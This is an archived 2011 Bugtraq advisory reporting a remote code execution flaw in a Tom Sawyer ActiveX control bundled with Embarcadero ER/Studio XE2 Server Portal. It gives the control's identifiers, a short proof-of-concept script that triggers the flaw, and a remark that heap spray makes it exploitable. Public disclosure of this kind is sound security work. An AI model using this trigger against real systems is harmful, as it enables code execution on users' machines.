lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201109070143.p871hfbd002754@sf01web3.securityfocus.com>
Date: Wed, 7 Sep 2011 01:43:41 GMT
From: nospam@...il.it
To: bugtraq@...urityfocus.com
Subject: Embarcadero ER/Studio XE2 Server Portal Tom Sawyer's Default GET
 Extension Factory ActiveX Control Remote Code Execution


See: CVE-2011-2217
reference url: http://www.securityfocus.com/bid/48099

The mentioned product is vulnerable to the same issue.

download url: https://downloads.embarcadero.com/free/er_studio_portal

ActiveX settings: 
ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1
CLSID:  {658ED6E7-0DA1-4ADD-B2FB-095F08091118}
Binary path: D:\Program Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll
Safe for scripting (registry): true
Safe for initialize (registry): true

poc:

<script>
var obj = new ActiveXObject("TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1");
</script>

then the dll will try to call inside an unitialized memory region
which is reachable by an attacker through heap spray.

//rgod

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ